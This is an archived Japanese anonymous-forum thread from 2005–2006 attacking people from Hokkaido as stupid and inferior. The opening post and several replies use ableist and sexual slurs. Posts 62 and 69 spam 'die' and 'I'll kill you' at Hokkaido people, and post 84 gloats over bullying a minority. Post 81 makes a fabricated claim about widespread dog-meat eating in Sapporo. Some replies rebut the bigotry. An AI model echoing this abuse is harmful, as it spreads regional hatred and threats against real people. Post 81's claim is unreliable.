5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

北海道人は馬鹿。反論禁止!!

1 :ナナシズム:2005/08/05(金) 06:16:15 ID:NdGRQQdD ?
おい!こら!どーみん!

9割以上の道民は劣っているんだ。これは絶対だ!
ほんと、道民同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
道民はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。どーみん。

道民は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にも本籍地北海道だよ?吐き気がするね。
北海道人で海外留学? ちょっと殺すよ?
まともな語学力もない道民が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な道民集団で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。道民は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
道民という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い道民は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が道民だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?どーみん


2 :ナナシズム:2005/08/05(金) 10:21:46 ID:DDf0Q7Ro
ぬるぽ

3 :ナナシズム:2005/08/05(金) 10:23:40 ID:???
○ッはしてやんない。

4 :ナナシズム死ね!!!!!!!!!!!!!!!!!!!!!!!!:2005/08/05(金) 11:36:44 ID:+HAB63Ea
生きてて恥ずかしくないの?どーみん って言われて気付いた

恥ずかしい!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!もう生きる勇気と希望が持てません




サヨナラ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

5 :ナナシズム:2005/08/05(金) 12:40:05 ID:6vDymC7z
北海道より沖縄のほうがDQNばっか。

6 :ナナシズム:2005/08/05(金) 12:45:15 ID:NdGRQQdD ?
>>5
琉球人のほうが英語しゃべれるだけマシ。
日本企業ではだめでも米国系の企業ならハンデにはならない

7 :ナナシズム:2005/08/05(金) 19:45:58 ID:s2IJL6u6
>1
で?





フッ

8 :ナナシズム:2005/08/05(金) 23:01:49 ID:???
>>4樣 はやまるな・俺もソッカラやり直したぜ!がんがれ!がんがれ!

9 :犯ずきん ◆71isWD/fFU :2005/08/05(金) 23:44:14 ID:tI18uNPq
なこるるはかわいい

10 :ナナシズム:2005/08/06(土) 23:42:13 ID:asAuTVhx
反論禁止とか好きだねー バカは死にな

11 :ナナシズム:2005/08/07(日) 03:23:05 ID:???
俺は>1だ。こんな性格だから友達いないんだ!このスレで俺と一緒になって北海道人を馬鹿にしてくれる奴らだけが心の友なんだ。
俺がこんな陰険な性格なのは当然親の影響だ。家族揃って陰険だから、近所から後ろ指を指されてるよ。
俺はマジでここのスレ主だ。
この際身元がバレないから早めに告白した次第…ort

12 :名無しさん:2005/08/07(日) 05:34:56 ID:???
 たしかに北海道人は
オオサカ人のように
「地元大好き人間」がおおい。
 あの地元に対する愛は
「井の中の蛙」を通り越した
妄信ともいえる

13 :食べ主義スレの住人 ◆8x8z91r9YM :2005/08/07(日) 05:59:35 ID:???
>>1この世のもの、とは思えぬ位、美しく、たおやかな道産娘に惚れられたら(~д~゜)ドースル?ドースル?

14 :ナナシズム:2005/08/07(日) 18:42:51 ID:???
>13
俺は>1だが…
どんなに可愛い女でも…
難しいなぁ…
まず俺の性格から改善せねば、いずれは逃げられる運命だ。

15 :ナナシズム:2005/08/07(日) 20:53:15 ID:Y3pucncM
人のことを劣ってるとかいうオマエだいぶ性格悪いね
本当に最低。他人を見下げられるほどの人間なのか?
オマエは。  絶対違うよな。そんな心のまま
大きくなったのが哀れだな。

16 :ナナシズム:2005/08/07(日) 21:12:54 ID:6hW+cyAF
それが道民の全て?

17 :ナナシズム:2005/08/07(日) 23:27:05 ID:hjqTNpR0
俺2年間札幌すんでたけど確かに道民ってちょっとなぁ・・・
なんか新しいもの好きっつうか、あきっぽいっつうか、コロコロ変わるっつうか。
なんでも 北海道最高!! ってとこもやだ。地元のテレビ局もプッシュしすぎ。
あとあの田舎っぽい北海道弁が嫌い。 ムカツク!

18 :ナナシズム:2005/08/07(日) 23:38:46 ID:JMV3u9KN
北海道は試験導入的なものが多いと聞いたけど真偽は?

19 :ナナシズム:2005/08/08(月) 11:27:20 ID:???
道民は大卒少ない。
そして層化多杉。
語学能力は微妙。青森よりマシ。

20 :むねを:2005/08/08(月) 18:51:17 ID:???
>>1
反論禁止っていうのは自分が答えられないから?
大体反論禁止っていうくらいなら書き込むなよ

21 :ナナシズム:2005/08/08(月) 22:27:57 ID:jTjU31wo
すいません。北海道の札幌市ってとこにある北嶺高校を卒業して、
東京大学理科V類に現役で合格したものです。
今は教養学部の2年生です。

22 :ナナシズム:2005/08/08(月) 22:30:03 ID:jTjU31wo
あ、教養学部理科V類です。言葉足らずですいません。


23 :ナナシズム:2005/08/09(火) 12:47:28 ID:O0TA6lVU
紋別の女子中学生はロシア人に体を売るとういうのは本当?
ロシアの船に一人で乗り込むらしいんだけど。

24 :ナナシズム:2005/08/09(火) 22:14:33 ID:H+pvWFmY
道民は極左売国奴集団
道新に煽られ横路を知事にした基地外


25 :ナナシズム:2005/08/10(水) 02:15:31 ID:???
広島、大阪、沖縄、北海道、さいたま

マジヤバス

26 :ナナシズム:2005/08/10(水) 18:05:33 ID:eOKrnunH
おれ、札幌出身だけどべつに北海道すきじゃねえな。
つーか道弁ってなに?この前TVで今一番標準語が喋られてるのは
札幌ですって言ってたよ。あ、ちなみに俺は今神奈川にいるんだけど。

27 :Mr名無し:2005/08/10(水) 18:11:50 ID:BA45tbq2
じゃがいも本当にうまい????

28 :ナナシズム:2005/08/10(水) 18:33:51 ID:fW+RyMIs
たしかに・・・道人は馬鹿っぽいですよね。なっちとか

29 :ナナシズム:2005/08/10(水) 18:56:36 ID:WoGxnPqv
モー娘。は北海道出身多いね。

30 :山田:2005/08/10(水) 19:01:26 ID:BA45tbq2
2人だけじゃない???

31 :ナナシズム:2005/08/10(水) 21:56:53 ID:WoGxnPqv
>30
ゴメン説明足りなかったね。辞めたの含めればだよ。

32 :ナナシズム:2005/08/12(金) 00:25:35 ID:Z7JrYvZP
じゃぁてめーらもう二度と北海道産のもの食うんじゃねぇぞ
そんだけバカにしてて 道産物食ってたら矛盾してるよな

33 :食べ主義スレの住人 ◆8x8z91r9YM :2005/08/14(日) 01:12:34 ID:???
ジャガイモとバターのホイル焼き、蟹色々、魚色々、鮭とイクラのチラシ、トウモロコシ、何故かシュウマイ、何故かアイスクリーム、(~д~゜)ウマー

34 :ナナシズム:2005/08/14(日) 21:58:26 ID:BuQXGsPe
  \
:::::  \            >>1の両腕に冷たい鉄の輪がはめられた
\:::::  \             
 \::::: _ヽ __   _     外界との連絡を断ち切る契約の印だ。
  ヽ/,  /_ ヽ/、 ヽ_  
   // /<  __) l -,|__) > 「刑事さん・・・、俺、どうして・・・
   || | <  __)_ゝJ_)_>    こんなスレ・・・たてちゃったのかな?」
\ ||.| <  ___)_(_)_ >
  \| |  <____ノ_(_)_ )   とめどなく大粒の涙がこぼれ落ち
   ヾヽニニ/ー--'/        震える彼の掌を濡らした。
    |_|_t_|_♀__|        
      9   ∂        「その答えを見つけるのは、お前自身だ。」
       6  ∂
       (9_∂          >>1は声をあげて泣いた。


35 :ナナシズム:2005/09/03(土) 23:07:43 ID:ji+hnESE
主さん、何か嫌な事でもあったんですか?
子供の頃、両親に十分な愛情をそそがれなかったとかですか?
私でよければ、お話し聞きますよ。

36 :ナナシズム:2005/09/03(土) 23:26:32 ID:ru85Xzku
http://anime.2ch.net/test/read.cgi/shar/1125546037/

37 :ナナシズム:2005/09/15(木) 22:55:09 ID:N5Q8ViWp
関西叩きに飽きた埼玉県民が建てた糞スレはここですか?

38 :ナナシズム:2005/09/15(木) 22:59:20 ID:???
あげんなよ!

39 :ナナシズム:2005/09/15(木) 23:04:12 ID:???
北海道の人間が馬鹿とか言ってるヤツが馬鹿。
以前にもあったが、食料も自前で満足に用意できない内地のヤツが訳分からん事を…

40 :ナナシズム:2005/09/16(金) 00:27:46 ID:CC4uO8PA
民主党の議席はほぼ北海道から。これは異常

だけど>1の大阪民国は北海道を批判出来る立場にない

41 :ナナシズム:2005/09/16(金) 00:45:13 ID:???
>>39
需要と供給
経済と農業

需要あっての供給
経済ありきの農業
逆もまた然り
馬鹿晒してんなよ?

42 :ナナシズム:2005/09/16(金) 15:36:04 ID:???
やはり馬鹿だったか…。
食(農業・畜産)があってこそ、働けるんだろうに…。
何が経済あっての農業なんだか…。

43 :ナナシズム:2005/09/16(金) 18:57:48 ID:Uf9bhOy9
一言言いたいのですが、何かを批判するなら
それ相応の理屈をだすべきだと思うのですが。
これといった根拠もなく批判もしくは悪口を言うのは
説得力もなく、礼儀に失した行為ではないでしょうか?
考えてみてください。


44 :ナナシズム:2005/09/16(金) 20:18:19 ID:???
十九の娘選挙に利用して
選挙法違反とたたかれる宗男をかばう
道民を見てると、ああ−って思うよ

45 :ナナシズム:2005/09/22(木) 12:05:45 ID:???
まぁ所詮道民だからww

46 :ナナシズム:2005/09/22(木) 13:48:48 ID:YQcg3jbp
あぁそうですかとしか言いようがないなー

47 :犯ずきん ◆71isWD/fFU :2005/09/22(木) 15:28:11 ID:ysCLFtVZ
千葉県民だけど
東京か北海道、どっち残したい?って聞かれたら
北海道を残すな。
東京はあると便利だけどなくてもいいし

48 :ナナシズム:2005/09/22(木) 15:39:21 ID:???
>>47
北海道は観光、食、情緒等、魅力のある都市だよね。
しかし残すとなればやはり東京だろう。一国の首都として繁栄し、経済のみならず政治の中枢として盤石の機能を果たしてきた。
首都移転はまだ現実的ではないし、実際的に肥大化した機能の分散は困難。米国の様に政・経分離しても当然の様に経済は東京が握り続けるのは明白。
現実にたつと東京は必要となる。

49 :ナナシズム:2005/09/23(金) 23:21:02 ID:0NWrIwlw
まぁあれだ、北海道はいいところだ。
な、みんな。そう思うだろ?

50 :ナナシズム:2005/10/25(火) 18:31:42 ID:hNUprYTZ
>>44
たいした知識もないくせに知ったこと言うなって。
地元では宗男はすごく地域に貢献してて、それで人気があったんだよ。
いくら叩かれたからって自分の地域のために一生懸命働いてくれてる人に見方するのが当たり前じゃないの?

と、道民がマジレスしてみた。
このスレの存在意義無し。都道府県に順位つける理由が解らないし。

51 :ナナシズム:2005/10/25(火) 19:42:27 ID:???
北海道の会社って
ひと回り年が違っても下請けでもバイトでも
ため口の人が多かったな

52 :ナナシズム:2005/10/26(水) 15:00:04 ID:???
北海道>(津軽海峡)>本州>(紀淡水道)>四国>(豊後水道)>九州>(東シナ海)>沖縄

53 :ナナシズム:2005/10/30(日) 16:50:58 ID:hzPHKuGh
おい!こら!>>1

>>1は劣っているんだ。これは絶対だ!
ほんと、>>1はダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
>>1はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。>>1

54 :ナナシズム:2005/11/03(木) 09:33:02 ID:f9dy4nhb
まぁ、>>1の言い分もわからんでもないが…
実際、「北海道民」って、どうしてこんなに頭の悪いのが多いのか…
同じ道民として情けなくなってくる。
特に、道徳というものを冥王星の彼方に老いて来たような
「会社の歯車」リタイヤ組…
その「厚かましさ」は関西某地域を思わせるような行動力。
ほとんど、猿状態…。
それに、「自分より劣った人間」を見下すような風潮。
「農作物や家畜」は育てられても「人間」は無理のようだか…。




でもなぁ、「反論禁止!!」とは・・・しょっぱいこと。
これじゃあ、>>1の「おなにーすれ」じゃん。
なんか、マジレスして損した気分。


55 :ナナシズム:2005/11/03(木) 10:07:23 ID:CdCwzu9A
>>1
こんなところで、北海道民を馬鹿にして鬱憤晴らしてる君。
君はなんでそんなことしてるんだい?
北海道出身の女の子好きになったけど、こてんぱんに振られた
童貞君かな?君はソープランドでも行って、早く童貞を捨てた
方がよいのではないかな?
拘ってたものがなくなって、一皮剥けるぞ。
って、君は真性包茎なのかな?


56 : ◆9TMzUbn7b2 :2005/11/03(木) 11:00:40 ID:???
 

57 :ナナシズム:2005/11/04(金) 10:45:46 ID:jhnqJaHW
私の友達の道民はやたら地元愛に満ち満ちて満ちすぎてキモイ。
やたら偏見強いし。
社会のことには無頓着で知識皆無なくせに自分の意見が最高と信じて疑わないし。
反論聞かないし。
民主主義の意味をはき違えてるし。
「お前は自分教原理主義者か?!」と注意しても通じないし>意味をわかってない

私怨スマソ(´・ω・´)ショボーン
あーすっきりした!!

58 :ナナシズム:2005/11/04(金) 16:41:51 ID:j+4Ct5Sx
おい!こら!>>1

1は狂っているんだ。これは絶対だ!
ほんと、1同士でダメな日本人を引き合いに出して優位に立つ幻想に浸って傷の舐め合いとか見てて哀れだよ。
1はちっぽけな存在だ。
寝て起きて飯食って盛ってセックスして寝て。と、動物みてーだな。知性の欠片もない。
同類の男女でたむろって楽しいか?
ちっぽけな愛。ちっぽけなカネ。ちっぽけな身分。ちっぽけな人生…  
オマエラにだって欲はあるだろ?チヤホヤされたいだろ?
ぃい女抱きたいだろ?いろんな物が欲しいだろ?いろんな経験したいだろ?金欲しいだろ?
嘘つくなよ。1。

>>1は見てて恥ずかしいよ。まともな会社すら受ける資格も持たない。
履歴書にもニートだよ?吐き気がするね。
1が海外留学? ちょっと殺すよ?
まともな語学力もない1が留学したら、俺らアジア人の顔に泥を塗ることになるんだ。
無能な>>1で縄張りなんか作って傷の舐め合い。バカ女は白人の肉便器。男はその肉便器のケツを追っ掛ける…
本人の自由だろって?自由の意味を吐き違えられちゃ困るね。
自由というものには責任もつくんだよ。君らゴミに責任能力などないくせに大口叩いてもらっちゃ困るよ。
そうだよ。>>1は人並み以下の努力もしないで、人並み以上の権利を要求する。
日本はバリアフリー化が進んで体が不自由な方も住みやすくなったが同時に経済発展で
>>1という名の知的障害者も恥ずかしさを感じずにスカして生きていやがる。
でも、こんな時代は終わるよ。二極化で勝ち組と負け組のどっちかになるほかない。
アタマの悪い1は将来と言っても明日明後日まで先のことしか考えられない。
長期的スパンで考える知能がないからね。だから大学に行かない考えなんかが浮かぶ。
もう自分が1だったらと考えたら恐ろしいね。夜も眠れないよ。


生きてて恥ずかしくないの?1。

59 :ナナシズム:2005/11/05(土) 13:56:59 ID:???
蝦夷共和国建国を妨害しといて今さらそりゃねぇなw

60 :ナナシズム:2005/11/09(水) 20:10:40 ID:XfXL+dvS
美瑛に住んで、幸せ。

61 :ナナシズム:2005/11/09(水) 20:11:20 ID:XfXL+dvS
ttp://hokkaido.machi.to/bbs/read.pl?BBS=hokkaidou&KEY=1126675280

62 :ナナシズム:2006/02/01(水) 02:55:29 ID:gBAEzq3Y
道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね
氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子
道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね
氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子
道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね
氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子
道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね
氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子
道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね
氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子氏ね道産子


63 :ナナシズム:2006/02/01(水) 16:20:47 ID:9NVmQ+Wj
>62
君、頭大丈夫?
(=^▽^=)

64 :道民:2006/02/01(水) 16:52:19 ID:jA2SUz1T
道民ですがなにか'A`?)


65 :ナナシズム:2006/02/01(水) 16:58:00 ID:C6Gx6oai
何校出身?

66 :ナナシズム:2006/02/02(木) 01:45:17 ID:Rg8RS2bE
・スピ−ド出しすぎ、なのに高速使わない奴多すぎ。
・排他的ではないが名古屋並に地元愛している奴多い、北海道から
出たことない奴多すぎ、井の中の蛙という言葉が適当。上場クラスの会社は
北海道出身者ばかり(例えば大学東京で卒業後北海道にUタ−ンする奴が多いらしい)
びっくりしたのが東京に異動になり転勤で会社辞める馬鹿がいた。
・女は上にも書いているが頭が悪いしヤリマンが多く男はデブが多い。
・景気が悪いのは個人もしくは住民の努力不足なのに景気が悪いとかほざいている。
・雪国なのにスキ−やボ−ドが下手な奴いる。
・勝ち組、負け組など競争することを嫌う人間がいる、年功序列っぽい会社が多いので
 個性的な奴があまりいない。
・冬、雪が多く道路の車線が片側1車線になる。

67 :ナナシズム:2006/02/02(木) 08:54:01 ID:???
>>1
反論禁止と書いてありますので、疑問点を述べさせていただきます。

・・・と思ったら、全部レッテル貼りですね。
もしそれらのことを証明したいのであれば、証拠をお持ちください。
ただの馬鹿と思われても仕方の無い文章ですよ。

>>66
・スピ−ド出しすぎ、なのに高速使わない奴多すぎ。
→両方とも、高速がさほど便利ではないのが理由ですね。

・排他的ではないが名古屋並に地元愛している奴多い、北海道から
出たことない奴多すぎ、井の中の蛙という言葉が適当。
→なぜ井の中の蛙なのでしょうか。地元を愛するのは別にいいのではないのでしょうか?

・女は上にも書いているが頭が悪いしヤリマンが多く男はデブが多い。
→頭良い悪いは個人の努力と学校のレベルによって左右されます。
残念ながら北海道には高いレベルの教育を受けれるところが余りありません。
(私の先生も(北海道で最高レベルの北大でも)駄目学校だ、といってましたので。)

・景気が悪いのは個人もしくは住民の努力不足なのに景気が悪いとかほざいている。
→実際北日本には大都市があまり無いので景気の回復は遅いです。
大企業は地方→札幌→東京と流れてしまうのでなおさらです。

・雪国なのにスキ−やボ−ドが下手な奴いる。
→雪国ならみんなスキーやスノーボードが上手いなどと思うほうが変ではないですか?

・勝ち組、負け組など競争することを嫌う人間がいる、年功序列っぽい会社が多いので
 個性的な奴があまりいない。
→まあ、昔ながらの日本と考えれば・・・?

・冬、雪が多く道路の車線が片側1車線になる。
→雪が捨てる場所がありません。
おかげでバスは平均10〜40分遅れます。
除雪対策費の増大も景気がよくならない要因のひとつかと思われます。

>>17
新しいもの好きで飽きっぽいのはありますね。
全国区のマスゴミが色々持ち上げることも原因かもしれない。 > 北海道最高
あと、どさんこワイドって知ってますよね?あの方式が他地方にも浸透したそうで。
方言に関してはさほど田舎っぽくは無いかと。

>>18
多分本当。
これは多分全国から色々な人が集まっているからか。
しかし北海道で成功しても必ず他地方で成功するとは限らないけれど。

以上北海道民の一人がお送りしました。
北海道に来たこともないでぐだぐだ言ってる奴、冬の朱鞠内で野宿でもしてこい。

68 :ナナシズム:2006/02/03(金) 04:57:27 ID:oC0fSOnu
平安北道 慈江道 両江道 咸鏡北道
   平安南道   咸鏡南道
    黄海北道
    黄海南道 江原道
    京畿道  江原道
    忠清北道
    忠清南道 慶尚北道
    全羅北道
    全羅南道 慶尚南道
   済州道


69 :ナナシズム:2006/02/03(金) 21:34:51 ID:oC0fSOnu
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す
死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人死ね殺す北海道人
どうぞ警察に通告してください。


70 :ナナシズム:2006/02/03(金) 22:38:01 ID:v7ngj4Kc
>69
お前頭大丈夫?

71 :ナナシズム:2006/02/07(火) 01:50:26 ID:L26o0fwU
   /   ,.- 、  ヾヽ、 ;; ;; _,-<  //_,,\' "' !| :l ゙i !_,,ヽ.l `ー─--  エィ' (. 7 /
   :    ' ・丿   ̄≠Ξイ´,-、 ヽ /イ´ r. `ー-'メ ,.-´、  i     u  ヾ``ー' イ____
    \_    _,,......::   ´゙i、 `¨ / i ヽ.__,,... '  u ゙l´.i・j.冫,イ゙l  / ``-、..- ノ :u l ,− ,−\ / ̄ ̄ ̄ ̄\
 u     ̄ ̄  彡"   、ヾ ̄``ミ::.l  u   j  i、`ー' .i / /、._    `'y   /, |・  |・ | ヽ_____ヽ
           u      `ヽ  ゙:l   ,.::- 、,, ,. ノ ゙ u ! /_   ̄ ー/ u /  `−●-' \ヽ , ─ 、 , ─ |
        _,,..,,_    ,.ィ、  /   |  /__   ``- 、_    l l  ``ーt、_ /  / ──  | ──ヽ|・   |・   |
  u  ,./´ "  ``- 、_J r'´  u 丿 .l,... `ー一''/   ノ  ト 、,,_____ ゙/ /..  ── | ── .|`─ 'っ - ´|
     ./__        ー7    /、 l   '゙ ヽ/  ,. '"  \`ー--- ",.::く、 |    ── | ── |.____) /
    /;;;''"  ̄ ̄ ───/  ゙  ,::'  \ヾニ==='"/ `- 、   ゙ー┬ '´ / \.____|__) / ___/
    .i:⌒`─-、_,....    l   /     `ー┬一'      ヽ    :l  /  , ' `ソヽ      /l \/\| \
    l      `  `ヽ、 l  ./  ヽ      l         )  ,; /   ,'    '^i━(t)━━l |      | |




72 :ナナシズム:2006/02/07(火) 01:53:11 ID:L26o0fwU
      ,--、、_     .|.¨''‐、     { .^>           ,-v._
      .\  ゙l.    ,「 ./      .!  .}           .), .\
       ゙'-、「   .ノ _.<)''ー┐    !  }            |  .:|
      ._,ノ''^^‐ノ厂(゙「v┐ .,}    |  |            !  i′   .,,,v-,,_
 ._,..、v-‐^′_.、v-:'゙.} }.、_ ! .}     ! .},_          ._,,「  ^┐.,,/゙冫  .゙>
 .゙v ,,,v-'''^゙,,、,   .} .´,.,ノ| .}    ._,|  ` ¨'┐     .r‐'^′  ,ノ!'゙>'″.}  .|
    ̄.,,.-‐'^`._冫 .} .「_,,_ | .|,、rー'''^′ .rー‐'′     .゙'‐-'''〕  .┌″   }  :|
     ゙'--'''^゙_   .| .¨,,,,フ! 「 个v-''^| .|           ,ノ  .i'′    .}  ノ
     ._,,v-''⌒゙> [ 「゙,,/  .,ノ   } |          .,/′ │     .}  }
    .゙\-‐''^′..、ノ ゙゙゙,.r') .,rミ^''ー< .! .!         / ノ|  |     .!  .|
    ._,,_ r-‐''゙^''v)!,,,./`/′ ! \ .| 〕 }       / .,/`.!  !     } │
    .〔 .゙'ミ‐'゙}  ノ   ,ノ゙_、 .|   ^''´ ! .|       /′.,/′ |  |     .!  .|    ,,ノア
    .), 〔 } :|  .,r'゙,/|  〕     |  |       } .,/゙ _ .}  |     .|  .゙ー-ー'^/
     .} .゙''^゙ _,,.フ.,r(>'″ .}  }    .|  |       .゙'″ (¨′ !      \___,,,/′
     ミ.,/'¨ ̄  ^′ .<''''′ .|   ,、、..(  !           \ .,|
              .\  .}   \  .}           .゙ー'′
               .^‐┘    .\.丿



73 :ナナシズム:2006/02/07(火) 02:07:25 ID:L26o0fwU
道民は、道外のことを内地と呼んでいるのか。
初めて知った。

74 :ナナシズム:2006/02/08(水) 04:57:33 ID:???
道民はいいよ道民。
女の子は色白で可愛くて巨乳が多いし、何より心が広い。
将来は道民になりたいね。

75 :ナナシズム:2006/02/08(水) 14:59:47 ID:10powkbB
漏れ道民で大学からこっち(東京)きたけど、>>1見て妙に共感して
しまった。
たしかに馬鹿がおおい。刹那主義で将来のことは考えない。
今よければいい、女は軽くて、男は女の子とばっかり考えてるわ。

76 :ナナシズム:2006/02/08(水) 17:53:53 ID:???

おつとめごくろうさま

77 :ナナシズム:2006/02/08(水) 18:13:25 ID:VOgtqa5C
 ミミ ヽヽヽヽリリノノノノ
    ミ   ,,、,、,、,、,、,、,、、 彡 
     l  i''"      U i彡
     | 」U ⌒' '⌒  |       
    ,r-/  <・> < ・> |       これは国策捜査です
    l       ノ( 、_, )ヽ |       国家の罠です
    ー' U ノ、__!!_,.、|      
     ∧     ヽニニソ  l      
   /\ヽ         /    
 /     ヽ.  `ー--一'


78 :ナナシズム:2006/02/08(水) 20:04:35 ID:I/bnOcvu
誰か道外逃亡を手伝ってくれ

79 :ナナシズム:2006/02/09(木) 02:16:52 ID:ocY0xJp7
>78
お前は礼文島に島流し

80 :ナナシズム:2006/02/11(土) 20:45:46 ID:KBduHqp1
1さんへ
あなたは運が悪かっただけ。

81 :ナナシズム:2006/02/15(水) 21:23:34 ID:WBc10s3D
札幌へ行ったらよく観察すると面白いのが、民家で飼われている犬です。
他の地域などで飼われている犬種と違って「赤犬」と言う
食用品種の犬が飼われています。(もちろん普通の犬の方が多いのですが)
札幌の肉屋さんのほとんどは300円ほどの手数料で飼い犬を解体してくれます。

熊本で馬肉(さくら肉)を食べるのが普通なように
札幌では犬肉(ポシンタン)を食べるのが珍しくないです。
※ちなみにジンギスカンは札幌五輪のときからのポシンタンの代用食。

札幌ではスーパーでも犬肉が売られていて一般に普及しています。
これも熊本の馬刺しの習慣とよく似ています。
札幌の家庭で「すき焼き」と言えば、犬肉の鍋料理(ポシンタン)です。
ちょっと抵抗があるかも知れませんが、勇気を出して食べてみて下さい。
なお、札幌では料理の材料をたずねるのは非常にヤボな事だとされてます。



82 :ナナシズム:2006/02/16(木) 17:14:26 ID:d4RTsLzl
地元意識強すぎ、北海道を悪く言うとムキになる
ファイターズが札幌に本拠地を移すとすぐにファイターズファンになれる
面白くも強くもないコンサドーレを必死に応援
鮭とホッケをうまい魚と思いこんでる


83 :ナナシズム:2006/02/16(木) 19:52:53 ID:???
http://academy4.2ch.net/test/read.cgi/sociology/1131200100

大分大学教授・八巻正治博士について語ろう!
前スレ http://ton.2ch.net/volunteer/kako/987/987828646.html
http://www8.ocn.ne.jp/~yamaki/

これが八巻正治。氏の学歴です。

【学習歴の記録】
 美幌幼稚園 卒園  美幌小学校 卒業  美幌中学校 卒業   美幌高校 卒業  ※高校は途中転入で、しかも不登校でした!

 順天堂大学  体育学部  健康教育学専攻   卒 業 ※ガンガン勉強しました!

 青山学院大学  第U文学部  教育学科  卒 業 ※幼稚園での教育実習も行いました!

 東洋大学  第U文学部  教育学科  卒 業 ※養護学校の教員免許を取得しました!

 立教大学・大学院  文学研究科:博士課程(前期)   教育学専攻  修 了 ※良き学師たちに巡り合えました!

 カリフォルニア神学大学院日本校    博士課程  キリスト教神学  修 了 ※神様の深き愛の素晴らしさを学びました!

 米ニューポート大学大学院  博士課程  教育学専攻  修 了 ※論文執筆に燃えました!--------------------------------------------------------------------------------

資       格
1973年03月19日   中学校教諭1級(千葉県教委 昭47中1普 第501号),高等学校教諭2級(昭47高2普 第427号) 教員免許状(保健体育)取得
1973年04月26日  衛生管理者免許状(第61号) 取得
1978年03月31日 養護学校教諭1級(東京都教育委員会 昭53養学1普 第132号) 教員免許状取得
1994年02月26日 『米セント・チャールズ大学(カリフォルニア神学大学院日本校:提携校)』より 『博士(宗教学)(Ph.D.)』 の学位を取得

こんな北海道人もいるんだぜ。

84 :あぼーん:2006/02/17(金) 00:37:02 ID:bNOW3tr0
必死だな、道産子。

あー弱者いびりは楽しいねえ。
由緒正しい日本人でなければできない遊びだよ。
まあ、嗜みのひとつって事で。

お前らは俺らの気分で運命すら左右される
野蛮人と罪人のなれの果てなんだよ。
悔しいか?理不尽か?そうだろうなあ。

でもそれはお前らが悪いんだよ。
少数派で弱者だからな。
誰もお前らを守ってはくれない。
お前ら自身で自分の身すら守れない。

みじめだねえ。


85 :ナナシズム:2006/02/17(金) 02:19:40 ID:G3e7T+XS
>>81

その話はガセ 嘘つき!

86 :あぼーん:2006/02/17(金) 15:15:58 ID:bNOW3tr0
     ,,,,,,,_               ,--、 ,!''''i、     ._,,,--,、  ,-,,、           ,r‐-,,、   .,_ .'ニ'ー.
     ゙ヽ .゙>    .__     | .l|-、| | ,ハ、|゙゙'二--―″  `i、│ .,,-―i、       `゙l .丿   ゙''ミヘヽ ゙|
